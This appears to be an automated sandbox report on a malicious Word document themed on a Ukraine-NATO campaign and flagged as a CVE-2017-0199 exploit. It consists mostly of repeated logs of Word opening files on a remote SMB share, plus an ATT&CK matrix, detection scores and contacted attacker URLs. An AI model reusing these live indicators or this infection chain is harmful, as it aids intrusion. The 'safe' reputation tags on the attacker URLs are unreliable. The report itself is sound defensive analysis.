Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\ex001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.htmJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.htmJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.search-msJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.search-msJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.search-msJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.search-msJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\redir_obj.htmJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\redir_obj.htmJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\redir_obj.htmJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\Jump to behavior
Opens network shares
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\SHARE1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\ex001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.htmJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.htmJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.search-msJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.search-msJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.search-msJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.zipJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_4f657_file001.search-msJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\redir_obj.htmJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\redir_obj.htmJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\1\redir_obj.htmJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\Jump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts2
Exploitation for Client Execution		Path Interception1
Process Injection		1
Masquerading		OS Credential Dumping2
Network Share Discovery		Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
Non-Application Layer Protocol		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Virtualization/Sandbox Evasion		LSASS Memory1
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
Application Layer Protocol		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
Process Injection		Security Account Manager1
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
Ingress Tool Transfer		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS2
System Information Discovery		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Overview_of_UWCs_UkraineInNATO_campaign.docx.doc30%ReversingLabsWin32.Exploit.CVE-2017-0199
Overview_of_UWCs_UkraineInNATO_campaign.docx.doc49%VirustotalBrowse
Overview_of_UWCs_UkraineInNATO_campaign.docx.doc100%AviraEXP/CVE-2017-0199.Gen

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%URL Reputationsafe
https://api.scheduler.0%URL Reputationsafe
https://api.scheduler.0%URL Reputationsafe
https://my.microsoftpersonalcontent.com0%URL Reputationsafe
https://my.microsoftpersonalcontent.com0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://api.aadrm.com0%URL Reputationsafe
https://api.aadrm.com0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://d.docs.live.net0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://make.powerautomate.com0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
http://74.50.94.156/MSHTML_C7/zip_k.asp?d=84.17.52.5_4f657_0%Avira URL Cloudsafe
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
http://74.50.94.156/MSHTML_C7/zip_k2.asp?d=84.17.52.5_4f657_0%Avira URL Cloudsafe
https://login.windows.local0%URL Reputationsafe
http://74.50.94.156/MSHTML_C7/start.xmlyX0%Avira URL Cloudsafe
http://74.50.94.156/MSHTML_C7/start.xml0%Avira URL Cloudsafe
http://74.50.94.156/MSHTML_C7/RFile.asp0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://74.50.94.156/MSHTML_C7/zip_k2.asp?d=84.17.52.5_4f657_false
  • Avira URL Cloud: safe
unknown
http://74.50.94.156/MSHTML_C7/zip_k.asp?d=84.17.52.5_4f657_false
  • Avira URL Cloud: safe
unknown
http://74.50.94.156/MSHTML_C7/start.xmlfalse
  • Avira URL Cloud: safe
unknown
http://74.50.94.156/MSHTML_C7/RFile.aspfalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.com3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
    		high
    https://login.microsoftonline.com/3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
      		high
      https://shell.suite.office.com:14433D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
        		high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
          		high
          https://autodiscover-s.outlook.com/3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
            		high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
              		high
              https://cdn.entity.3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
              • URL Reputation: safe
              		unknown
              https://api.addins.omex.office.net/appinfo/query3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                		high
                https://clients.config.office.net/user/v1.0/tenantassociationkey3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                  		high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                    		high
                    https://powerlift.acompli.net3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://lookup.onenote.com/lookup/geolocation/v13D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                      		high
                      https://cortana.ai3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                        		high
                        https://cloudfiles.onenote.com/upload.aspx3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                          		high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                            		high
                            https://entitlement.diagnosticssdf.office.com3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                              		high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                		high
                                https://api.aadrm.com/3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                • URL Reputation: safe
                                		unknown
                                http://74.50.94.156/MSHTML_C7/start.xmlyX~WRF{23F61671-1248-4D9F-BE58-51806C7F80DF}.tmp.0.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.yammer.com3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                  		high
                                  https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                    		high
                                    https://api.microsoftstream.com/api/3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                      		high
                                      https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                        		high
                                        https://cr.office.com3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                          		high
                                          https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          https://portal.office.com/account/?ref=ClientMeControl3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                            		high
                                            https://graph.ppe.windows.net3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                              		high
                                              https://res.getmicrosoftkey.com/api/redemptionevents3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drfalse
                                              • URL Reputation: safe
                                              		unknown
